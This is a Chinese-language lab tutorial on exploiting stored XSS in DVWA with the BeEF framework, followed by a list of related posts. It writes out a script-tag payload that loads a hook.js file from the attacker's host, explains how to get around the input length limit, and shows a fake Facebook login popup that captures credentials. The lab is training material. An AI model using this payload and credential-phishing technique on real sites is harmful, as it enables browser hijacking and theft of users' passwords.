DVWA-XSS(Stored)-beef

用Low Level来测试beef的使用

beef配置

如果kali没有beef的,进行下载

bash 复制代码
apt install beef-xss

使用

bash 复制代码
beef-xss         # 命令方式启动
beef-xss-stop    # 命令方式关闭 
systemctl start beef-xss.service   #开启beefsystemctl 
stop beef-xss.service     #关闭beefsystemctl 
restart beef-xss.service  #重启beef

打开beef web界面

beef连接

拿Low Level 的xss漏洞测试

beef hook.js的链接为:http://192.168.20.145:3000/hook.js 145为kali IP。

输入666<script src="http://192.168.20.145:3000/hook.js"></script>

前端message处,前端做了输入长度限制,用burp抓包或者直接在前端界面修改长度限制都可以。

当客户端打开界面时192.168.20.1主机上线。(打开浏览器界面的主机会上线)

beef功能

Details:受害者浏览器信息

Logs:记录浏览器操作记录

Commands:向受害者发送指令的模块

下面记录几个功能

  1. 页面重定向

    选中Redirect Browser模块,右侧输入想要跳转到的网址

  2. 弹窗

    Pretty Theft模块,Dislog Type可以选择不同弹窗,这里用facebook做演示,Custom Log处选kali的IP。

    弹窗,输入账号密码。

    在beef的history处可以查看账号密码。

相关推荐
安全系统学习3 天前
网络安全最新XSS漏洞
网络·安全·web安全·网络安全·xss
吾即是光6 天前
Xss挑战(跨脚本攻击)
前端·xss
渗透测试老鸟-九青6 天前
通过组合Self-XSS + CSRF得到存储型XSS
服务器·前端·javascript·数据库·ecmascript·xss·csrf
morris1316 天前
【SpringBoot】使用过滤器进行XSS防御
spring boot·xss·过滤器
fkalis8 天前
【海外SRC漏洞挖掘】谷歌语法发现XSS+Waf Bypass
前端·xss
渗透测试老鸟-九青8 天前
通过投毒Bingbot索引挖掘必应中的存储型XSS
服务器·前端·javascript·安全·web安全·缓存·xss
dal118网工任子仪10 天前
xss的过滤和绕过(2)
笔记·学习·计算机网络·网络安全·xss
dal118网工任子仪11 天前
web安全漏洞之xss(1)
笔记·学习·web安全·网络安全·xss
Wh1teR0se11 天前
ctfshow(328)--XSS漏洞--存储型XSS
前端·xss
IT猫咪酱11 天前
XSS过滤器Filter实现
java·springboot·xss